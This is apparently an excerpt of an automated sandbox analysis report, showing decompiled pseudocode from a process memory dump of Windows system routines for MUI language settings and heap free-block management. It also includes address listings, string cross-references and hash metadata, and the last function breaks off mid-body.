				if(E02961B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E02961B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E02961B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L02974620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0299F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E029A1370(_t276, 0x2934e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0299BB40(0,  &_v68, _t170);
									if(L029643C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0299BB40(_t257,  &_v68, _t243);
								if(L029643C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E029A1370(_t278, 0x2934e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L02974620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0299F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E029A1370(_v16, 0x2934e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0299BB40(_t262,  &_v68, _t244);
								if(L029643C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E029A1370(_t282, 0x2934e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0299BB40(_t262,  &_v68, _t201);
							if(L029643C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L02974620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0299F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E029A1370(_t280, 0x2934e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0299BB40(_t267,  &_v68, _t245);
							if(L029643C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E029A1370(_t284, 0x2934e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0299BB40(_t267,  &_v68, _t224);
						if(L029643C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x02963d3c
0x02963d42
0x02963d44
0x02963d46
0x02963d49
0x02963d4c
0x02963d4f
0x02963d52
0x02963d55
0x02963d58
0x02963d5b
0x02963d5f
0x02963d61
0x02963d66
0x029b8213
0x029b8218
0x02964085
0x02964088
0x0296408e
0x02964094
0x0296409a
0x029640a0
0x029640a6
0x029640a9
0x029640af
0x029640b6
0x029640bd
0x029640bd
0x02963d83
0x029b821f
0x029b8229
0x029b8238
0x029b8238
0x029b823d
0x029b823d
0x02963da0
0x02963daf
0x02963db5
0x02963dba
0x02963dba
0x02963dd4
0x02963e94
0x02963eab
0x02963f6d
0x02963f84
0x0296406b
0x0296406b
0x0296406e
0x0296406e
0x02964070
0x02964074
0x029b8351
0x029b8351
0x0296407a
0x0296407f
0x029b835d
0x029b8370
0x029b8377
0x029b8379
0x029b837c
0x029b837c
0x029b835d
0x00000000
0x0296407f
0x02963f8a
0x02963f8d
0x02963f90
0x02963f95
0x029b830d
0x029b830f
0x02963f9b
0x02963fac
0x02963fae
0x02963fb1
0x02963fb1
0x02963fb6
0x029b8317
0x029b831a
0x00000000
0x02963fbc
0x02963fc1
0x02963fc9
0x02963fd7
0x02963fda
0x02963fdd
0x02964021
0x02964021
0x02964029
0x02964030
0x02964044
0x02964046
0x02964046
0x02964044
0x02964049
0x029b8327
0x029b8334
0x029b8339
0x029b833c
0x0296404f
0x0296404f
0x0296404f
0x02964051
0x02964056
0x02964063
0x02964063
0x02964068
0x00000000
0x02964068
0x02963fdf
0x02963fe2
0x02963fe4
0x02963fe7
0x02963fef
0x02964003
0x02964005
0x02964005
0x0296400c
0x02964013
0x02964016
0x02964017
0x0296401b
0x0296401e
0x00000000
0x0296401e
0x02963fb6
0x02963eb1
0x02963eb4
0x02963eb7
0x02963ebc
0x029b82a9
0x029b82ab
0x02963ec2
0x02963ed3
0x02963ed5
0x02963ed8
0x02963ed8
0x02963edd
0x029b82b3
0x029b82b6
0x00000000
0x02963ee3
0x02963ee8
0x02963eed
0x02963ef0
0x02963ef3
0x02963f02
0x02963f05
0x02963f08
0x029b82c0
0x029b82c3
0x029b82c5
0x029b82c8
0x029b82d0
0x029b82e4
0x029b82e6
0x029b82e6
0x029b82ed
0x029b82f4
0x029b82f7
0x029b82f8
0x029b82fc
0x029b82ff
0x029b82ff
0x02963f0e
0x02963f11
0x02963f16
0x02963f1d
0x02963f31
0x029b8307
0x029b8307
0x02963f31
0x02963f39
0x02963f48
0x02963f4d
0x02963f50
0x02963f50
0x02963f53
0x02963f58
0x02963f65
0x02963f65
0x02963f6a
0x00000000
0x02963f6a
0x02963edd
0x02963dda
0x02963ddd
0x02963de0
0x02963de5
0x029b8245
0x02963deb
0x02963df7
0x02963dfc
0x02963dfe
0x02963e01
0x02963e01
0x02963e06
0x029b824d
0x029b824f
0x029b8254
0x00000000
0x02963e0c
0x02963e11
0x02963e16
0x02963e19
0x02963e29
0x02963e2c
0x02963e2f
0x029b825c
0x029b825f
0x029b8261
0x029b8264
0x029b826c
0x029b8280
0x029b8282
0x029b8282
0x029b8289
0x029b8290
0x029b8293
0x029b8294
0x029b8298
0x029b829b
0x029b829b
0x02963e35
0x02963e38
0x02963e3d
0x02963e44
0x02963e58
0x029b82a3
0x029b82a3
0x02963e58
0x02963e60
0x02963e6f
0x02963e74
0x02963e77
0x02963e77
0x02963e7a
0x02963e7f
0x02963e8c
0x02963e8c
0x02963e91
0x00000000
0x02963e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 02963E97
Kernel-MUI-Language-Allowed, xrefs: 02963DC0
Kernel-MUI-Language-SKU, xrefs: 02963F70
Kernel-MUI-Number-Allowed, xrefs: 02963D8C
WindowsExcludedProcs, xrefs: 02963D6F

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 41bae5f417d548bdc17fa72731fd9f1bd390b1382827b1da62762b9b514380c3
Instruction ID: 9908b6fe8943412dcf2adae19da0ce7140ef41fcdb01dcfcb8ddcf51a60db2b5
Opcode Fuzzy Hash: 41bae5f417d548bdc17fa72731fd9f1bd390b1382827b1da62762b9b514380c3
Instruction Fuzzy Hash: 66F1F976D00619EBCB12DFD8C984AEEBBFDBF48B50F15046AE505A7250E7349E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0297A830, Relevance: 6.6, Strings: 5, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0297A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x2a48748 - 1;
					if( *0x2a48748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0295B150();
									_t260 = _t257 + 4;
								} else {
									E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0295B150();
								_t257 = _t260 + 4;
								__eflags =  *0x2a47bc8;
								if(__eflags == 0) {
									E02A12073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E02A1A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E029AD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0297AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E02A1A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E02A1A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x2a48748 - 1;
					if( *0x2a48748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0295B150();
							} else {
								E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0295B150();
							__eflags =  *0x2a47bc8;
							if(__eflags == 0) {
								_t131 = E02A12073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x0297a83a
0x0297a83c
0x0297a83e
0x0297a841
0x0297a844
0x0297a84a
0x0297aa53
0x0297aa59
0x0297aa59
0x0297a858
0x0297a85e
0x0297aaf5
0x0297aafc
0x029c229e
0x029c22a2
0x029c22a8
0x029c22b3
0x029c22b5
0x029c22bb
0x029c22c1
0x029c22c5
0x029c22e6
0x029c22eb
0x029c22f0
0x029c22c7
0x029c22dc
0x029c22e1
0x029c22e1
0x029c22f3
0x029c22f8
0x029c22fd
0x029c2300
0x029c2307
0x029c230e
0x029c230e
0x029c2313
0x029c2313
0x029c22b5
0x029c22a2
0x0297aafc
0x0297a864
0x0297a869
0x0297aa5c
0x0297aa5e
0x0297a86f
0x0297a87f
0x0297a885
0x0297a885
0x0297a88b
0x0297a890
0x0297a896
0x0297ab0c
0x0297ab0f
0x0297ab15
0x029c2320
0x029c2320
0x0297ab1b
0x0297a89c
0x0297a89f
0x0297a8a2
0x0297a8a2
0x0297a8a5
0x0297a8af
0x0297a8b3
0x0297a8b8
0x0297aa66
0x0297a8be
0x0297a8c5
0x0297a8c6
0x0297a8ce
0x029c2328
0x029c2332
0x029c2337
0x029c2337
0x0297a8ce
0x0297a8d4
0x0297a8d8
0x0297a8db
0x0297a8de
0x0297a8e1
0x0297a8e5
0x0297a8e8
0x0297a8f0
0x0297a8f3
0x029c234c
0x029c2350
0x029c2355
0x029c2359
0x029c2359
0x0297a8f9
0x0297a901
0x0297aae4
0x0297aae4
0x0297aaea
0x00000000
0x0297a907
0x0297a90a
0x0297a91d
0x0297a91d
0x00000000
0x0297a910
0x0297a910
0x0297a910
0x0297a914
0x0297a924
0x0297a924
0x0297a924
0x0297a924
0x0297a916
0x0297a91b
0x00000000
0x00000000
0x00000000
0x0297a91b
0x0297a925
0x0297a925
0x0297a932
0x0297a936
0x0297a93c
0x0297a93c
0x0297a93c
0x0297ab22
0x0297ab24
0x0297ab27
0x0297ab27
0x0297a942
0x0297a944
0x0297aaba
0x0297aabd
0x0297aac0
0x0297aac0
0x0297aac2
0x0297ab2f
0x0297aac4
0x0297aac4
0x0297aac7
0x0297aaca
0x0297aacc
0x0297aace
0x0297aace
0x0297aace
0x0297aad1
0x0297aad1
0x0297aad7
0x0297aad9
0x00000000
0x00000000
0x029c2361
0x029c2369
0x029c236b
0x00000000
0x029c2371
0x00000000
0x029c2371
0x00000000
0x029c236b
0x0297aac0
0x0297a94a
0x0297a94a
0x0297a94d
0x0297a94d
0x0297a950
0x0297a954
0x029c2376
0x029c2380
0x0297a95a
0x0297a95a
0x0297a95c
0x0297a95f
0x0297a961
0x0297a961
0x0297a967
0x0297a96a
0x0297a972
0x0297aa02
0x0297aa06
0x0297aa10
0x0297aa16
0x0297aa16
0x0297aa1b
0x0297aa21
0x0297aa24
0x0297aa27
0x0297aa29
0x0297aa2c
0x0297aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x0297a978
0x0297a978
0x0297a97b
0x0297a981
0x0297a996
0x0297a998
0x0297a99f
0x0297a9a2
0x029c238a
0x0297a9a8
0x0297a9a8
0x0297a9a8
0x0297a9aa
0x0297a9ad
0x0297a9b0
0x0297a9bb
0x0297a9be
0x0297a9c7
0x0297a9c9
0x0297a9c9
0x0297a9cc
0x0297a9d1
0x0297aa6d
0x0297aa70
0x0297aa73
0x0297aa75
0x0297aa79
0x0297aa7e
0x0297aa82
0x0297aa8f
0x0297aa94
0x0297aa96
0x029c2392
0x029c23a1
0x029c23a1
0x0297aa9c
0x0297aa9f
0x0297aaa2
0x0297aaa2
0x0297aaa8
0x0297aaab
0x0297aaaf
0x00000000
0x0297aab5
0x00000000
0x0297aab5
0x0297a9d7
0x0297a9d7
0x0297a9da
0x0297a9e0
0x0297a9e3
0x0297a9e6
0x0297a9e9
0x0297a9eb
0x0297a9fd
0x0297a9fd
0x00000000
0x0297a9eb
0x00000000
0x00000000
0x00000000
0x0297a983
0x0297a983
0x0297a983
0x0297a987
0x0297a995
0x0297a995
0x0297a995
0x0297a995
0x0297a989
0x0297a98e
0x00000000
0x0297a990
0x00000000
0x0297a990
0x0297a98e
0x00000000
0x0297a983
0x0297a972
0x0297a90a
0x0297aa34
0x0297aa34
0x0297aa40
0x0297aa43
0x0297aa46
0x0297aa4d
0x029c23ab
0x029c23b2
0x029c23b8
0x029c23be
0x029c23c3
0x029c23c5
0x029c23cb
0x029c23d1
0x029c23d5
0x029c23f6
0x029c23fb
0x029c23d7
0x029c23ec
0x029c23f1
0x029c2403
0x029c2408
0x029c2410
0x029c2417
0x029c2422
0x029c2422
0x029c2417
0x029c23c5
0x029c23b2
0x00000000

Strings

HEAP: , xrefs: 029C22E6, 029C23F6
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 029C22F3
MZER, xrefs: 0297A87F
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 029C2403
HEAP[%wZ]: , xrefs: 029C22D7, 029C23E7

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $MZER$ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-718285528
Opcode ID: 13d25af30821c81441a02f1079c1f36437bc9ddf33f753ab6bc248b1258968bb
Instruction ID: c0019cd3d8fbd67610200b6ae87245e881552f996f39d771fa18191250e12fb7
Opcode Fuzzy Hash: 13d25af30821c81441a02f1079c1f36437bc9ddf33f753ab6bc248b1258968bb
Instruction Fuzzy Hash: D6D1CC34A002459FDB18CF68C590BBEB7F6FF88304F248569D89A9B785E734E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A2E824, Relevance: 6.5, APIs: 4, Instructions: 493
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E02A2E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x2a4d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L0297FAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E0297FA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x2a4b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E02972280(E0299F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
